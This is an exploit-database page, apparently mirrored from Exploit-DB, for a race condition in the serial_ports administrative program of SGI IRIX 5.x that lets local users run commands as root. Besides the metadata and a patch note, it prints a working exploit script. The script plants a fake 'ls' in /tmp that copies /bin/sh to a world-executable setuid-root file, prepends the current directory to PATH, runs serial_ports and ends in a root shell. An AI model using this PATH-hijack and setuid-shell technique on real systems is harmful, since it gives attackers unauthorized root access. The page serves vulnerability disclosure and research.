header-logo
Suggest Exploit
vendor:
Irix
by:
SecurityFocus
7.2
CVSS
HIGH
Race Condition
362
CWE
Product Name: Irix
Affected Version From: 5.x
Affected Version To: 5.x
Patch Exists: YES
Related CWE: N/A
CPE: o:sgi:irix:5.x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix
2002

Race Condition in SGI 5.x Irix serial_ports administrative program

A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root. To exploit this vulnerability, an attacker can create a shell script in the /tmp directory, set the PATH variable to include the /tmp directory, and then execute the serial_ports program. After waiting for 10-20 seconds, the attacker can then execute the shell script as root.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/464/info


A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root.


cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
chmod 755 /tmp/ls
cd /tmp
set PATH=( . $PATH )
/usr/lib/vadmin/serial_ports
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
/tmp/foo
# whoami
root

Navigation

Suggest Exploit

Services By CQR